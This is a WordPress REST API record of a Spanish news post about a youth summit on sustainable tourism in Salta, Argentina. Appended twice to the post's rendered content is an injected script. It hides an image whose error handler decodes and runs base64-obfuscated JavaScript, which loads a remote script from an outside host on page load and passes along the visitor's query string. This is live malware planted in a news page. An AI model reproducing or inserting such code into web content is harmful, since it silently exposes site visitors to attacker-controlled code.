{"id":1328,"date":"2022-08-19T19:59:56","date_gmt":"2022-08-19T22:59:56","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1328"},"modified":"2025-08-14T00:38:05","modified_gmt":"2025-08-14T03:38:05","slug":"salta-convoco-a-estudiantes-de-america-latina-a-trabajar-en-un-turismo-sostenible","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1328","title":{"rendered":"Salta convoc\u00f3 a estudiantes de Am\u00e9rica Latina a trabajar en un turismo sostenible"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#8f0c2d\">Alrededor de 200 estudiantes dialogaron con expertos internacionales y trabajaron de manera conjunta en torno al turismo sostenible. El aporte de j\u00f3venes ser\u00e1 integrado a la ejecuci\u00f3n del Plan Liderar.<\/h4>\n\n\n\n<p>El ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a&nbsp;<\/strong>inaugur\u00f3 junto al director de la Escuela Universitaria de Turismo de la UCASAL,&nbsp;<strong>Horacio Cornejo,&nbsp;<\/strong>la Cumbre Internacional de J\u00f3venes por un Turismo Sostenible que congreg\u00f3 de manera virtual a estudiantes de Am\u00e9rica Latina quienes participaron de un conversatorio con expertos internacionales y realizaron tareas en equipo.<\/p>\n\n\n\n<p>El titular de la cartera Tur\u00edstica destac\u00f3 la importancia de involucrar a los j\u00f3venes en el desarrollo de la actividad a futuro. \u201cCreemos que la formaci\u00f3n continua es un pilar clave\u00bb, asegur\u00f3. Al respecto, se refiri\u00f3 a la 1ra edici\u00f3n del Hackaton que se realiz\u00f3 en 2021 y que en octubre de este a\u00f1o tomar\u00e1 lo trabajado en la Cumbre.&nbsp;<br>&nbsp;<br>Asimismo, Pe\u00f1a se refiri\u00f3 al Plan Liderar que, junto a 37 municipios, estableci\u00f3 los ejes y objetivos para los pr\u00f3ximos 5 a\u00f1os, sobre el particular indic\u00f3 que a partir de la pol\u00edtica de Estado que es el turismo, se trabaja para, a partir de un trabajo articulado con los gobiernos nacional, municipal, la comunidad y el sector privado avanzar en el crecimiento tur\u00edstico que genera empleo y mejora la calidad de vida de los salte\u00f1os.&nbsp;<br>&nbsp;<br>\u201cEste Plan tiene tres ejes fundamentales: el desarrollo, la promoci\u00f3n y justamente la formaci\u00f3n de recursos humanos\u00bb, se\u00f1al\u00f3 el funcionario, por eso anunci\u00f3 que \u201clos resultados del Hackaton &nbsp;formar\u00e1n parte de la ejecuci\u00f3n de Liderar \u201c.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3794-salta-convoco-a-estudiantes-de-america-latina-a-trabajar-en-un-turismo-sostenible.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3794-salta-convoco-a-estudiantes-de-america-latina-a-trabajar-en-un-turismo-sostenible.jpg\" alt=\"Salta convoc\u00f3 a estudiantes de Am\u00e9rica Latina a trabajar en un turismo sostenible\"\/><\/a><\/figure>\n\n\n\n<p>Por su parte, Horacio Cornejo expres\u00f3 el valor de desarrollar acciones de capacitaci\u00f3n para construir un mejor turismo que permite ver crecer las comunidades. Asimismo, sostuvo que los objetivos planteados en la Cumbre son compartidos por la Ucasal que es abrir espacios para la formaci\u00f3n de los j\u00f3venes. \u00a0<br>\u00a0<br>A posteriori se desarroll\u00f3 el conversatorio moderado por V\u00edctor Chal\u00e9 G\u00f3ngora (M\u00e9xico) estuvo conformado por Lina Ch\u00e1vez Palomares (M\u00e9xico), Ramiro Ragno\u00a0(Salta \u2013 Argentina) y Felipe Vera (Chile) quienes respondieron a preguntas formuladas por equipos conformados por participantes del primer Hackaton.\u00a0<br>\u00a0<br>La Cumbre Internacional de J\u00f3venes por un Turismo Sostenible, declarada de Inter\u00e9s por la C\u00e1mara de Senadores de Salta y fue coorganizada por el Ministerio de Turismo y Deportes de Salta y la Ucasal, con el soporte de Naci\u00f3n y las provincias de Misiones, Chubut, Entre R\u00edos, Santiago del Estero y Catamarca, universidades de Argentina, M\u00e9xico y Colombia, y actores del sector privado.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Salta convoc\u00f3 a estudiantes de Am\u00e9rica Latina a trabajar en un turismo sostenible\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/fTdP5yzA_pU?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Alrededor de 200 estudiantes dialogaron con expertos internacionales y trabajaron de manera conjunta en torno al turismo sostenible. El aporte de j\u00f3venes ser\u00e1 integrado a la ejecuci\u00f3n del Plan Liderar. El ministro de Turismo y Deportes&nbsp;Mario Pe\u00f1a&nbsp;inaugur\u00f3 junto al director de la Escuela Universitaria de Turismo de la UCASAL,&nbsp;Horacio Cornejo,&nbsp;la Cumbre Internacional de J\u00f3venes por [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1329,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-1328","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1328"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1328"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1328\/revisions"}],"predecessor-version":[{"id":7388,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1328\/revisions\/7388"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1329"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1328"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1328"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1328"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}